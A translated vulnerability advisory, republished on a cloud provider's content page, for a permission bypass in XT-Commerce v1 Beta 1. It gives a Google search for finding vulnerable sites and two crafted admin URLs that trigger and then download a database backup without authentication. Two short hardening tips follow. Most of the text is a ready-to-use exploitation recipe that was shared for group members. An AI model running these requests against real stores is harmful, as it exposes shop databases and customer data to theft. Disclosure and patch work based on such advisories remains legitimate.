XT-Commerce v1 Beta 1 Permission Bypass modification download backup Vulnerability

Source: Internet
Author: User

First launch: Hongke Network Security
Author: Amxking
Submit: indoushka
Vulnerability: XT-Commerce v1 Beta 1
Affected Versions: v1 Beta 1
Risk Level: Medium
Vulnerability description:
Amxking: This vulnerability was obtained when I spoke with the Avengers team outside China. It was published by indoushka. I translated, supplemented, edited, and published the vulnerability, this vulnerability is a method for obtaining backup database information. The translation is provided to the members of the Group. The principle is very simple and there is nothing special about it. Let's briefly introduce the process:
Vulnerability exploitation:
1. Search for Powered by XT-Commerce by google or use the target of the set of Programs

2. Backup:
Http://bbs.honkwin.com/XT-Commerce/admin/backup.php/login.php? Action = backupnow

3. Download backup: http://bbs.honkwin.com/XT-Commerce/admin/backup.php/login.php? Action = download & file = db_comm-20100301222138. SQL
Note: if you cannot download it using IE, we recommend that you download it using Mozilla Firefox10.10.

Security suggestions:

1. Background permissions and authentication.
2. We recommend that you keep the backup database path out of the web directory and strictly control the access permission.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.